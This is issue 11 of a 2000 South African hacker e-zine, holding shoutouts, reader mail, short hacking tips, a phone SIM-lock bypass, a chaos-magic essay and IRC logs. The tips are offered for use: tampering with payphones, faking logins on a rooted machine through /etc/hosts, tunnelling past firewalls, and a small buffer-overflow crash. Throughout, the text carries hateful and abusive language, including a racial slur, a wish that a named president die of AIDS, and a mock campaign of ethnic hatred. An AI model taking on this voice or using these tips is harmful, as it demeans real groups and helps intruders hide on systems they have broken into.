                                  :    ____
                                i..?W$$$$$$$          __                           
                               ;Q$$P"    $$$        ;$$$                           
                             .$$$;'      $$$        I$$$                           
                            I$$. :       $$$        $$$;                           
                           ;$I?  .       $$$    _..$$$;                            
                           $$$;          $$$y#Q$$$$$P'                             
                           $$$           $$$P""^^                                  
                      _____$$$           $$$;                                      
                      $$$$$$$$$$$$$$     `$$$y,                                    
                      ''^""$$$^^""""     ;,"?$$$#,                                 
                           $$$           I$#  ^$$$$,                               
                           $$y,          $$$    ?$$$;                              
                           $$$;          $$$    ;$$$I                              
                              :          $$$     $$$$                              
                              .                  $$$$                              

          Forbidden Knowledge Issue Eleven: Released 16th May 2000AD
        Leet0 Wizdumb's 17th Birfday Ish!@#$% Happy Birfday to Me!@#$%^

      ---===---===---===---===---===---===---===---===---===---===---===---===---===
      
                                        Shout Outz
                                        +-======-+
      MDMA, Sigma, DrSmoke, TimeWiz, meiso, Coldblood, Rawhed, JungleG, RIFT, {},
      Slash, b0f, Most of the hoez from Blabber.Net's #hack (Aragon, Opium, acid,
      xanex, et al), Pushers who give LSD to Five Year Olds, Cruciphux, Gevil,
      All the blasphemers from article 0x45, Catholic School Girls that give good
      head
      
                                         Fuck Youz
                                         +-=====-+
      Catholic School Girls that DON'T, People who can't see the humour in the abuse
      of homeless people, Homeless People, All the hoez in the acne remedy
      commercials with no acne, *!*@dal.net, *!*@under.net, People who wait until
      the *END* of the answering machine message before they hang up, Defacers,
      People who think defacers have skillz, People who write e-zines, People who
      think people who write e-zines have skillz, Loud Annoying Evangelical
      Churches, kppp users, Broccoli
      
      
      Movies of the Month: American Beauty
                           South Park - Bigger, Longer and Uncut
      
      Sites of the Month: Info Regarding Egodeath                   hv2k.voltage.org
                          My Personal FK Mirror                   www.mdma.za.net/fk
                          H/P E-Zine Community                   scene.textfiles.com
      
      Narq of the Month: MostHateD (Congradulations!@#$%^&)
      
      Windoze 9x command of da month: copy /Y c:\windows\logos.sys c:\logo.sys
      
      Short Story of the Month: "The Doom that came to Sarnath" by HP Lovecraft
      
      Fun: Walking out the plane in Zimbabwe's airport wearing a T-Shirt that says
           "Whites rule. The Zimbabwean government is hiding the aliens from us.
           Gay Rights now."
      
      Official FK11 Soundtrack: KoRn, Limp Bizkit, Rage Against the Machine, Bush,
                                Eminem, Red Hot Chilli Peppers, Rammstein, Pixies,
                                Springbok Nude Girls, Radiohead, Bloodhound Gang,
                                Our Lady Peace, Cypress Hill, Blink182, Orgy
      
      Scary: Seeing an automatically flushing urinal for the first time ever just
             after eating Psilocybe Mushrooms
      
      Oh: If you have copies of Forbidden Knowledge printed out and lying in your
          office's waiting room like we have heard several people have - PLEASE
          PLEASE PLEASE take a photo of them and your waiting room, scan them in,
          and e-mail them to wizdumb@leet.org ;-) Don't have a scanner? E-mail us
          for a snail mail addy, but just GET US THOSE PICTURES. =)
      
      Amusing: Thabo Mbeki's public statement (and letter to Bill Clinton) saying
               that it can't be proved that HIV leads to AIDS - especially
               considering how much goddamn medical experience he has. And lets not
               even *begin* to consider the amount of damage a statement like that
               can cause when almost a *third* of the world is HIV positive. Thabo
               Mbeki, I sincerely hope that you get AIDS and die. I am actually
               *ashamed* to have such a fucking idiot as a president.
      
           ________,,,...........                 .........______
      $$$$$$$$$^^^^^                                      '''''"""???zz.   $$
         ^?$$$                                                                `?; $$
           '$$         Contents of Forbidden Knowledge Issue 11                $;$$$
            ?;                                                              ,,?;I$$$
           ,"________________________________________________________..,,##',  $$
        _.+                                                                     +.,;
      
      
              0x90> Credits
              0x90> Editorial
              0x90> Mail from the Readers
      
              Articlez...
      
              0x30> Byteware of the Month                          [Wyze1, Jus, DvD]
              0x31> Unlocking Cellphones without the Mastercode               [Moe1]
              0x32> Hacking Reality: An Introduction to Khaos Magick       [Wyzewun]
      REM     0x33> Details of Microsoft's Space Exploration Plan           [Pneuma]
              0x34> K-Rad Oh-Day Christianity Warez                        [Various]
              0x35> Cisco PIX (and others) Denial of Service Attack       [Vortexia]
              0x36> An Introduction to Java Servlets                       [Wyzewun]
              0x37> Fixing M-Web Specific Modems                           [JungleG]
              0x38> Miscellaneous IRC Gayness                              [Various]
      
              Other junk...
      
              0x41> The Mysterious blommetjies.jpg (Zoom In :P)            [Wyzewun]
              0x42> Completely Useless killmod.php3 Warez                  [Wyzewun]
              0x43> Internet Explorer 4/5 Hostile VBScript                 [Wyzewun]
              0x44> Share Password Extractor Version 2                       [Sigma]
              0x45> Microsoft Access 97 Database Password Remover          [Wyzewun]
              0x46> Lame Ass Win9x/NT4 Backdoor                            [Wyzewun]
              0x47> Windoze Dialup Account Login Ripper                      [Sigma]
              0x48> B0nus Super-el8 Esteban Warez                          [Various]
              0x49> MDMA Advisories #2 through to #4                       [Wyzewun]
              0x50> Various Stupid-ass DoS vulnerabilties                  [Wyzewun]
      
              0x90> Outro
      ,?'
      $$;
      $$$QQQ####,,,,________________________________           _________    ______ _
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                  People who made this Issue possible           ._ ,;:;,, _.
      
      The Usual Bitchez who contributed...
      -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
      Wyzewun
      Pneuma
      Vortexia
      Moe1
      Jus
      
      Special Thanx to Deeze Guest Bitchez...
      -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
      JungleG
      Sigma
      DvD
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      ^^^^^^^^^""""""
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                          Editorial by Wizdumb                  ._ ,;:;,, _.
      
      So last week me and my bitchez...
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                           Mail from The Readers                ._ ,;:;,, _.
      
      Date: Tue, 4 Apr 2000 08:43:39 -0500 (CDT)
      From: Al Mccain <reswh0re@conspire.arcsnet.net>
      To: wizdumb@leet.org
      Subject: got a question about someone..
      Message-ID: <Pine.LNX.4.05.10004040842370.17988-100000@conspire.arcsnet.net>
      MIME-Version: 1.0
      Content-Type: TEXT/PLAIN; charset=US-ASCII
      
      sigma, where is he from?
      think i know him, just not sure.
      
      [Ed: I replied with "Huh? Who are you?" and I kinda never heard from him
           again, HEH! ;-P Still - mail like this worries me.]
      
      ------
      
      [Ed: I posted something to scene.textfiles.com to the effect of "Forbidden
           Knowledge Issue One to Ten released, but we were too dumb to notice"
           and got the following reply...]
      
      X-Authentication-Warning: lala.navpoint.com: mogel owned process doing -bs
      Date: Fri, 7 Apr 2000 15:55:38 -0500 (EST)
      From: mogel <mogel@hoe.nu>
      X-Sender: mogel@lala.navpoint.com
      To: Wyzewun <wizdumb@leet.org>
      Subject: FK and scene.textfiles.com
      In-Reply-To: <200004071104.EAA31560@nak.dreamhost.com>
      Message-ID: <Pine.LNX.4.10.10004071554090.670-100000@lala.navpoint.com>
      MIME-Version: 1.0
      Content-Type: TEXT/PLAIN; charset=US-ASCII
      
              I'm glad you wrote me, I tried to contact you like two months ago,
      but those addresses bounced back.  I added you folks to the site... feel
      free to shoot me an email whenever you guys release, and I'll announce it
      on my site.  You might consider making a mailing list to announce
      whenever there's a release to readers, or something.  Keep in touch.
      
      -Mogel
      
      [Ed: More about this at the end of the zine]
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                               Byteware                         ._ ,;:;,, _.
      
      Byteware from Wyzewun...
      
      When beigeboxing a South African cardphone, you are interested in one of the
      white wires and the blue wire, okay?
      
      ------
      
      Telkom's new boxes look like this...
                        ___________
                       /    ()     \
                       -------------
                       | ___       |
                       | \  \      |
                       |  \__\     |
                       |   OOO     |
                       |    OOO    |
                       |     OOO   |
                       |           |
                       |           |
             ,,,,,,,,,,|___________|,,,,,,,,,,
      
      Okay, so my ascii art sucks (I guess I shoulda gotten Cyberphreak to draw
      this) but what the fuck. Regardless, they're tall and thin, and are opened at
      the top using the little hole which I pathetically tried to depict. ;-P It
      appears that these boxes are Telkom's new preffered system, and they are worth
      finding ways to break into (That prefferably don't involve kicking the whole
      thing to pieces) - and if you succeed in breaking into one - write us an
      article on it!@#$% :-)
      
      ------
      
      No-one sends fuck you'z to the FK editorial staff in their e-zines! We feel
      unimportant! Pleeze Pleeze Pleeeeze - you're not hardk0re if you don't have
      an el8 rival zine that hates you! :-(
      
      Actually, I have a feeling this approach isn't going to work. Hmm... Plan B...
      
      Phrack  :       FUCK YOU!@#$%^&
      BoW     :       FUCK YOU!@$%&^&*
      f41th   :       FUCK YOU!@#$%
      FK      :       FUCK YOU!#$#%^... No... Wait a Minute...
      b0g     :       FUCK YOU!#@$^&*
      b4b0    :       FUCK YOU!@#$%&*
      ch4x    :       FUCK YOU!@$#%&(
      ~el8    :       FUCK YOU!$#$^*(%
      HWA.HN  :       FUCK YOU!@##$%^$&
      NoU     :       TAKE 0FF J0R CL0THEZ!#@%%$&&*
      
      ------
      
      Here's an *EXTREMELY* simple little patch for tcp_seq.h I wrote for
      FreeBSD (tested on 3.4-RELEASE, but should work on 2.2 - 4.0) to increase
      security and to stop nmap from recognizing the OS (which is the real
      reason I wrote it, the extra security offered is not really necessary :P).
      This just shows you how simply a TCP/IP fingerprint can be spoofed...
      
      Once extracted just run patch tcp_seq.h diff.file in /sys/netinet
      
      --- cut diff file here ---
      96c96
      < #define       TCP_ISSINCR     (122*1024 + tcp_random18())
      ---
      > #define       TCP_ISSINCR     (random())
      100c100
      < #define       TCP_ISSINCR     (250*1024)      /* increment for tcp_iss each second */
      ---
      > #define       TCP_ISSINCR     (random())      /* increment for tcp_iss each second */
      --- cut diff file here ---
      
      ------
      
      Looking through the logs on Pneuma's box I found this...
      
      <snip>
      <Gentoo> Well, the buffer overflow examples are a little lame ... but, it
      actually seems okay at second glance.
      <Pneuma> hehhehehehe, it usually is, it grows on you
      <Gentoo> THough, I could see why you might have to try so hard -- it's on
      Windoze ......
      <Pneuma> whats on windows?
      <Gentoo> The buffer overflow program example.
      <Pneuma> heh, its aimed at newbies and compiles under *nix neway :P
      <Gentoo> Well, it's also C++ ... cin >> of course checks for buffer overflows.
      </snip>
      
      *Sigh* I hate it when idiots try and make it look like *I'm* wrong...
      
      C:\temp>type gay.cpp
      
      #include <iostream.h>
      
      void main() {
        char beer[5];
        cin >> beer; }
      
      C:\temp>cl gay.cpp
      Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
      Copyright (C) Microsoft Corp 1984-1998. All rights reserved.
      
      gay.cpp
      Microsoft (R) Incremental Linker Version 6.00.8168
      Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
      
      /out:gay.exe
      gay.obj
      
      C:\temp>gay
      AAAAAAAAAAAAAAA
      
      GAY caused an invalid page fault in
      module <unknown> at 00de:00414141.
      Registers:
      EAX=004089a0 CS=015f EIP=00414141 EFLGS=00010246
      EBX=00530000 SS=0167 ESP=0063fe00 EBP=41414141
      ECX=0000000a DS=0167 ESI=8162c000 FS=1a8f
      EDX=0076066f ES=0167 EDI=00000000 GS=0000
      
      Gosh, EIP and EBP look a bit weird. *Sigh* Just because texts up to now have
      not mentioned buffer overflow related problems with cin and ifstream doesn't
      mean they don't exist.
      
      In fact, I am willing to *bet* that the buffer overflows in WinAMP's reading
      of playlists and Netscape Navigator's reading of prefs.js were both caused by
      improper use of an ifstream. This is also a huge problem because this is how
      *every* C++ course/tutorial tells programmers to use their ifstreams like
      that. Anyway, the real moral of the story - Fuck off and check your facts
      before you whine. ;-P
      
      ------
      
      Some extracts from a recent e-mail to me from okby@b4b0.org which may be of
      interest to some hoez...
      
      <snip>
      Indeed we are still putting out the ezine. Sorry, but we've been off for
      awhile, mainly due to real life problems in everyones schedule. Real life
      comes before internet. Anyhow, we're back in business, and we're stronger than
      ever.
      </snip>
      
      <snip>
      (ps. if you have anybody else you know that would be interested in submitting
      anything to the ezine please let them know that we'll look at anything
      especially if it has something about social antics or programming in it.
      thnx.)
      </snip>
      
      ------
      
      Pneuma and I have decided to chose some completely arbitary race to hate with
      a passion. We looked in an Atlas and found Andorra, a tiny little country
      between France and Spain with a population of about 2000, and decided that it
      would do well. Before we were completely unaware of the great threat of this
      nation, and now we have made the shocking discovery that They're everywhere!
      They're taking all our jobs! They're corrupting our way of life!
      
      First of all - you must know how to identify Andoranns so as to be able to
      persecute them at every possible moment. We have decided that they all,
      without doubt, have hair growing out their ears. You can also always tell an
      Andorran by their nose. We don't know exactly what *about* it, but we are sure
      this identification technique is also completely infallable.
      
      And boy oh boy, when an Andorran moves into your neighbourhood - you'll know
      about it! Your children will worship Satan, take drugs, and eat... starchy
      stuff! Things will go missing everywhere (The Andorrans are *born* thieves,
      they even steal their currency from France and Spain!) And we're not even
      going to *begin* talking about their SMELL!
      
      So - join the fight against Andorra before it's too late! Besides - it's fun
      saying "Oh yeah, well at least (X Racial Group) aren't as bad as the fucking
      ANDORRANS!" and everyone always assumes that comments about Andorrans relate
      to *their* racial group - whatever that may be.
      
      Oh, and if you live in Andorra, please, please, e-mail us. ;-P
      
      ------
      
      Interesting fact of the month, as found in issue four of b0g... <www.b0g.org>
      
      <snip>
      LONGEST PUBES
      Maoni Vi of Cape Town has hair measuring 32 inches from the armpits and 28
      inches from her minge.
      </snip>
      
      Yeah! Gov-Boi's home town! Coincedence? I think not. ;-) Shjeesh, and ppl
      wonder why I keep on ripping off CT. :-P
      
      ------
      
      Real-life quote of the month...
      
      <Pneumas_Mom> Marcel, it says in this magazine that men like being anally
       fingered during sex. How should I approach Steve about this?
      
      ------
      
      Don't want your Java to run on Microsoft VM's? Then instead of using this...
      
        public static void main(String[] args) {
      
      Use THIS...
      
        static void main(String[] args) {
      
      And it will work in anything except M$-made stuff. ;-)
      
      ------****------
      
      Byteware from Jus...
      
      How to impress your lame linux buddies? If you haven't figured this one out
      yet, congratulations - I'm speechless. 'nix uses a file called /etc/hosts to
      identify known hosts for domain resolution, to prevent a full DNS lookup
      everytime that host or IP is used, or if a DNS lookup isn't suitable for that
      IP. Usually this will contain something like localhost resolving to 127.0.0.1
      and your machines (static) IP and its hostname (obviously only if the machine
      has one) /etc/hosts ovverrides DNS lookups, so you can play cute games with it
      on your machine. For example, change 127.0.0.1's resolution from "localhost"
      to "whitehouse.gov". Telnet 127.0.0.1, login and voila - do a "who" and see
      yourself logged in from the whitehouse :P
      
      This can actually be very useful to hide your connections as many people will
      take what a "who" says at face value and not look any further into it - root a
      box, change your current IP's resolution in that machines /etc/hosts to your
      enemy next door, and telnet in and you appear to be connected from
      idiot.hostname.com's machine... now there's a thought... Obviously you can't
      use this very seriously - if you're smart enough to get that far you will
      realise that a netstat -na will show otherwise :P
      
      ------
      
      Got any annoying network firewall you wanna sneak around? Well, if you aren't
      a prize circus clown then you may have already discovered the beauty of some
      simple code known as datapipe (src on www.security.za.net). Your usual network
      firewall will have basic things open like http (80) and ftp (21) allowed out,
      but not your favorite's like telnet (23), ssh (22) or irc (6667) - tsk, shame.
      Datapipe lets you setup a pipe for data coming in on one port to another port
      on another host - sounds interesting. You could run datapipe on a machine
      outside of your network to listen on port 80 or 21, and then pipe the
      connection to your irc server on port 6667, or even to the local machine's
      telnet or ssh port... gee, that was tough. You could then /server
      externalmachine.com 21 or telnet externalmachine.com 80, and the network
      firewall will allow the outgoing data stream, but the external datapipe will
      change the flow of data to where you really want it to go -
      deranged.blabber.net (6667) for example :) [Wyzewun: Yeh, BlabberNet is neat,
      pity about the gay IRCOps there though (Jus, Vortexia, TimeWiz) :P] You will
      get datapipe, use it and like it. Duh.
      
      ------****------
      
      Byteware from DvD...
      
      In RedHat 6.0, users with uid 1000 or higher can execute 'shutdown -r now',
      which will cause the system to reboot and go into single-user mode. Oops.
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.          Cellphone Unlocking without the Mastercode by Moe1    ._ ,;:;,, _.
      
      This works on Nokia 21xx/31xx/51xx/81xx. 
      This doesnt work on software version (5.04).
       
      First of all your PIN code must be on, then press C, arrow down, C, and hold 
      until it clears display then press * and hold until it starts to blink then
      press * again and hold until it starts to blink then type 
      04*YOURPIN*YOURPIN*YOURPIN#.
      
      It should then say "PIN code changed" or something and the SIM card is now
      accepted. Note: Each time you turn your phone OFF it resets the lock, so
      this need to be done each time you'll turn your phone ON.
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.    Hacking Reality: An Introduction to Khaos Magick by Wyzewun ._ ,;:;,, _.
      
      As a practicing Chaote, I was very interested to have recently seen two
      articles regarding occult issues in what would strictly be called H/P e-zines.
      The two e-zines I am reffering to are b4b0 issue 9 and b0g issue 2, and the
      two schools covered being Khaos Magick and Satanism respectively. Both zines
      are available @ PSS should you be interested in checking them out some time.
      (http://packetstorm.securify.com/mag)
      
      So why did I see a need for another article on the subject? Well, Synner's
      article in b4b0, despite being quite good, left out a few very important
      points as to what Khaos Magick is all about. I will also try and throw as many
      of my personal opinions about Khaos Magick into this as possible, to make it
      interesting to people already familiar with the system. And ultimately, it's
      hard to summarize such a complex system in a single article - so read both
      anyway. ;-)
      
      As for reading the article in b0g on Satanism... well... I have to be honest -
      I found the entire original content insipid and stupid but the passages quoted
      directly out of Anton LaVey's Satanic Bible make it worth reading anyway,
      despite the typos. Especially considering that LaVey was influenced by
      Aleister Crowley and HP Lovecraft as were many of the early Khaos Magicians
      like Austin Osman Spare. And more importantly, regardless of that article,
      b0g has to be one of the funniest zines the H/P community have produced ever.
      
      Right. Now Let's get started... The alt.magick.chaos FAQ contains a menagerie
      of definitions of Khaos Magick, and I suggest you read them all should you
      be interested. But the one I am going to give you in this article comes from
      Joseph Max.555, who I think defines it quite well...
      
         Chaos Magick is currently the cutting edge of modern Ceremonial
         Magick. It largely grew out of the work of Austin Osman Spare, though
         it has been fractalized into many forms over the last 10 or so years.
         
         Chaos Magick emphasizes a personal, experimental approach to magickal
         practice, de-emphasizes "traditional" approaches (ie. GD, OTO, et al)
         especially as regards "secret knowledge", male/female dichotomies and
         order hierarchy; what can be learned from Masters or Gurus is far less
         important or effective than what a dedicated researcher can discover
         for hirself. As such, shamanism is incorporated more directly than
         such historical approaches as Kaballa, though most Chaotes are quite
         adept at examining traditional systems, incorporating what works and
         discarding that which holds no personal appeal.
         
         Chaos Magicians look at Magick as being a _living_ art rather than an
         _antique_ one. They regard the various belief structures of magick as
         being the _means_ rather than the _end_, and the most adept can alter
         their belief-state as easily as they change clothes. Chaos Magick
         recognizes no particular system of theology as having any more
         "reality" than any other, and most Chaotes (like Jung) approach
         dieties as being no more than archtypical constructs of the
         subconscious mind. Therefore they are far less concerned with having
         any (in their eyes) arbitrary moral system pounded into their skulls
         before getting to actually put magickal techniques into practical use
         than "Old Aeon" systems like the GD's or Abra-Melin.
         
         Chaos Magick propounds no particular dogma or moral system, beyond
         it's most common identifier: "Nothing is True, and Everything is
         Permitted."
         
         I have yet to meet, however, any adept Chaos Magician who doesn't have
         a strong sense of personal ethics and subscribe to it feverently.
      
      And in this one see's many of the points which Synner neglected to mention.
      But before even beginning to touch on those, I'm going to hop way back and
      give my personal definition of Magick in general for the benefit of those
      unfamiliar with such a concept beyond fairy-tale literature...
                                        
      Magick is the art of bending reality to one's will for whatever reason be it
      personal or so-called "god sent". Magick *has* to exist simply because so many
      people in so many different places practice it. And even should Magick *not*
      exist, *because* so many people practice it, it *does*. Why? Because Magick
      exists. Confused? Good. I have succeeded in wasting your time. Now let's move
      on... ;-)
      
      Now let's begin to look at approaches to Magick. Up to the point where Khaos
      Magick stepped into the world, Magick was approached largely from a
      traditional viewpoint. This means that Magick has been performed in manners
      passed down over generations, the original method of which was probably
      obtained from some-one who had ingested something hallucinogenic, was mildly
      insane, or perhaps actually had a very strong affinity with the supernatural.
      Of course, to a Chaos Magician (reffered to from here on as Chaotes), which
      one of these it was doesn't really matter in terms of effectivity. :)
      
      You see, most chaotes adopt Jung's concept of gods as archetypes of the
      subconscious mind. Thus the emphasis is not placed on *HOW* Magick should be
      performed, but on actually *MAKING* it happen. The Chaote acknowledges that
      an invocation to Homer Simpson can be just as effective and in some cases
      perhaps even more effective than one to a traditional deity. Also, which
      represents drunkeness better to you - Dionysus (ancient greek god of wine) or
      Barney from the Simpsons? I thought so. Now maybe you're whining that Barney
      isn't a "god", but to some extent, he IS, in that by you *thinking* of him as
      a god, he becomes so. Nothing needs to "exist" - it works anyway - which is
      why Chaos Magick is the only school to have Athiest magicians. :)
      
      In Conclusion, I would like to recommend that anyone interested in learning
      more about Magick and particularly Khaos Magick, should read the work of
      the following people who have written stuff in these fields...
      
      Psychology: Jung, Freud, Nietschze
      
      Occult: Peter Carrol, Austin Osman Spare, Anton LaVey, Aleister Crowley,
              Tzimon Yliaster, Phil Hine
      
      Fiction: Isaac Asimov (Esp. "The Last Question"), HP Lovecraft, JRR Tolkein
      
      Art and Theatre Movements: Surrealism, Constructivism, Dadaism, Absurdism,
                                 Existentialism, Expressionism
      
      And also check out the following URL'z...
      
      www.chaosmatrix.com
      www.crl.com/~tzimon
      www.occultsearch.com
      www.chaosmagic.com
      www.execpc.com/~discord/iot
      ds.dial.pipex.com/specularium
      
      Later this year, Pneuma and I will publish "Liber Tine" online, the book on
      our approach to Khaos Magick which we are writing. Until then, Cheers...
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.              K-r4d 0h-Day Chr1stian1tY War3z fr0m Var10uz      ._ ,;:;,, _.
      
      We recieved divine inspiration from the following visitor to #5fm, who has
      bestowed upon us great wisdom which we shall cherish our entire life...
      
      --- BEGIN LOG ---
      
      * lee (lee@ABD7AD12.ipt.aol.com) has joined #5fm
      <Pneuma> <efG>
      <opium> pn3um4, i h4ck3d n4s4
      <lee> hello any christians out there???
      <lee> helllloooooooo
      <Pneuma> lee: I just ate them all, maybe tommorow :P
      <Lupine> lol
      <BiNg_> keep religion out of this channel
      <opium> h m hw  hk
      <nemesis> BiNg_: YEAH!!
      <ALLOK> huh?
      <Pneuma> lee: I told you already, I Ate them all, try tommorow!
      <lee> no, GOD is everywhere!!!!!!!!!!!!!!!!!!
      <opium> pneuma, t34ch m3 h0w t0 h4ck!!
      <BiNg_> ?
      <Pneuma> Ok, enuff about religion b4 I make u cry
      <lee> what is wrong with you, why cry???
      <nemesis> lee : go away to #god or something
      <opium> i worship Pneuma
      <opium> he is my gof
      <opium> he is my god
      <lee> never heard of him
      <Pneuma> Opium: thats understandable
      <ALLOK> i worship money
      <lee> shaim
      <lee> money.................
      * Pneuma is the god of good sex, beer, and evil computer trix
      <nemesis> lee : ja ... so leave.
      <BiNg_> i dont bow down before anyone
      <lee> well, some day, when GOD comes, EVERYBODY will bow
      <ALLOK> to me
      <BiNg_> can you prove that
      <lee> bible
      <BiNg_> oh yeah
      <nemesis> lee : GET THE HINT? # god
      <Pneuma> JESUS MOWS MY LAWN!!!!!!!!!!!!!
      <lee> be carefull what you say!!!!!!!!!!!!!!!!!!!!!!!
      <nemesis> lee : or what?
      <lee> well, tonight i will pray for you and someday your'e eyes will open
      <ALLOK> aaaaaaaaaaaaaaaaaaaaaaaahhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaahh
              MY EEEEEEEEYYYYYEEEEEEEEEESS
      <ALLOK> I'M BLIND
      <nemesis> Lee : yeah whatever...the aliens built us, or sum such shit
      <BiNg_> why should i trust someone who took away to of my closest friends and then
              when i ask someone they say "god works in mysterious ways"
      <nemesis> BiNg_: yeah...explain that..
      <lee> well, stop being stupid, you know the truth but you are to proud to
            admit it, why can't you just chat, that is all i want
      <ALLOK> BOOM, (it's the voice of G.O.D)
      <opium> lee: *lick*
      <nemesis> Lee : isnt it prayer time or sumthing?
      <lee> are all of you from sa
      <Pneuma> Yes, and proud of it, Better than being a dumb hippie american :P
      <opium> YAAAAAAAAAAAAAAAAAAAWN
      <nemesis> lee: WHO CARES? { sumbody plz kick him!!}
      <ALLOK> i care
      <lee> also safrican
      <lee> who says it's a him
      <BiNg_> religion is the world's best practical joke
      <opium> lee, are u gay?
      <Pneuma> HEH!
      <lee> no, i am straight and i am a girl
      <opium> oh
      <lee> opium, wanna chat.
      <opium> nah
      
      --- END LOG ---
      
      So, inspired by the light of Jesus, we decided to 'grep -i' all our IRC logs
      for 'jesus' and 'christ' - the results of which looked something to the effect
      of this...
      
      In #b4b0 ...
      
      <samj> cause like christians are against alternate life styles
      * Topic is 'Let's party like we were at a christian suicide.'
      <opcode> jesus christ.
      <majere> jesus h fucking christ
      <jcb> jesus christ
      <JimJones> JESUS CHRIST
      <gl4z> jesus chr1st. 
      <chrak> jesus be in heaven
      <gore> I'm so sick of jesus
      <lusta> jesus
      <tymat> jesus
      <elneenja> jesus du0d
      <tip> jesus.
      <JimJones> jesus thats a stupid ploy.
      
      In #ch4x ...
      
      <peapeJ> at a fucking club for christ's sake
      <di9ital> jesus
      <di9ital> jesus fuck
      
      In Blabber.Net's #hack ...
      
      <Aragon> christ
      <xanex> Blu_J: CHRIST
      <cinos> christ
      <cinos> christ almighty
      <cinos> hey christ man
      <cinos> christ
      <cinos> christ all fucking mighty
      <Jaguar> christ..
      <fern> i mean CHRIST!
      <taliesin> hmmm... all i want for christmas is my little cray, my little cray
      <fern> GEZUZ FUCKING CHRIST SUPERSTAR
      <fern> my oath to christ
      <cache> christ i wonder how fuqn ugly she was to go for someone lookin like u
      <fREkaZ0iD> HOLY CHRIST Sega Dreamcast has 24mb ram!!!!!!
      <vision> for christ sake
      <vision> christ vort ;P teach some people here how tcp/ip works
      <vision> jus :P christ i use fbsd.
      <vision> christ everyone shutup
      <vision> christ i wonder whats going on.
      <vision> christ (: i know ipv4 better than the people who designed it.
      <vision> christ i am smurfing myself now.
      <fREkaZ0iD> dood you are as pissed as a coloured on christmas eve
      <Umaro> jesus christ
      <wyze1> ack! christians!
      <jus> christ :P
      * opium was kicked by hotmetal (YOU DO NOT RUN NAMED FOR CHRISTS SAKE)
      <Aragon> christ
      <DrSmoke> jesus christ netscape is a piece of shit.
      <DrSmoke> jesus christ wget
      <MAgikm> christ
      <dem0n> christ
      <dem0n> christ what a lame topic
      * Topic is 'Vortexia looks like Jesus'
      <X-sTrEaM> UglyKidJoe: jesus bru at least upgrade to OSR2.
      <X-sTrEaM> jesus
      <X-sTrEaM> c/s: 48867? jesus!@#
      <fREAkaZ0iD> jesus my modem cant do that
      <xanex> Vortexia: hey wanker jesus wannabe
      <fREkaZ0iD> jesus
      <fREkaZ0iD> holy jesus
      <fREkaZ0iD> jesus
      <Aragon> jesus, 40 sectors bad
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <Umaro> jesus christ
      <fREkaZ0iD> JESUS CHRUST
      <Pneuma> jesus d00ds, so god damn what if we like the bible!!!
      <Estaga> jesusfuck
      <DrSmok[e]> jesus I'm still rushing
      
      In #HWA.hax0r.news ...
      
      <_655321_> fucking christ man
      <wyze1> Told you all Christians were insane :P
      <Who74> oh christ
      <Who74> christ
      <Who74> christ, it wasnt that good
      <Cruciphux> christ
      <SugarKing> oh jesus
      
      In #Legions ...
      
      <BloodAxe^> !fuck Christina Aguilera
      <Cyrano423> ahh k, I should start some Christianity questions (hopefully that
      statement did not offend anyone)
      <Mnemonic> Zao == Christian hardcore
      <lothos> christianity scares me
      <Mnemonic> it's Christian hardcore
      * techn1cs has quit IRC (he dreamed a god up and called it christianity)
      <DataShark> christ redhat labs droped 3 1/4.
      <KrankShft> christ almighty.
      <ritual> christian rock sucks
      <Dixie> i dont care if you were jesus fucking christ.
      <Mnemonic> but don't use Christ's name in vain
      <ritual> christian music blows
      <cyrez> christian, muslim, buddah, jehova.... all the same
      <nofx> christ
      * Becky- has quit IRC (Jesus may love you, but everyone else thinks you're an
        asshole.)
      <jorge> jesus, people upstairz fuqn sound like they r fuqn killing people by
       hitting them with baseball bats
      <Je5u5> #Jesus unable to rejoin channel (you're banned!)
      <Je5u5> they do not LIKE JESUS
      <Je5u5> I am in JESUS CHAN 
      * shekk is now known as fukJesuS
      * fukJesuS is now known as jesusblow
      <slackette> hehe Nt im opped in #jesus
      <Cyrano423> why is it they do not talk about Jesus in #jesus
      <wyze1> I bet you I could make them talk about Jesus ;P
      <wyze1> <wyze1> y0 man, i had dis mad dream dat i had anal sex0r with jesus,
       what do u think it meanz?
      <wyze1> <wyze1> i never knew jesus was a nigger
      <Kane14> jesus
      <Kane14> jesus
      <ironik> jesus
      <methix> oh jesus
      
      In the (now deceased) #zahack on EFNet ...
      
      <vision> christ i am pissed off.
      <vision> christ.
      <cyberphrk> and how when it was my turn, santa (satan if you concentrate real
       hard) asked me what i wanted for christmas, and i replied with a big
       stupid-ass smile, 'A BEAVER!'
      <xmagii> jesus christ, have u no shame
      <vortexia> geeezus christ
      <vortexia> geeezus christ if this is the way my friends repay me for what I do
      <vision> for christ sake what did i miss now.
      <Vortexia> PhreakAZD yes, I believe in God, I am a Christian, though I do not
       follow organized religion, my Christianity is derived from how I perceieve
       the bible, not how others do
      <xmagii> jesus don't start that ? crap again
      <xmagii> jesus the chances of the sequencing being right must be one in a
       million
      <xmagii> jesus
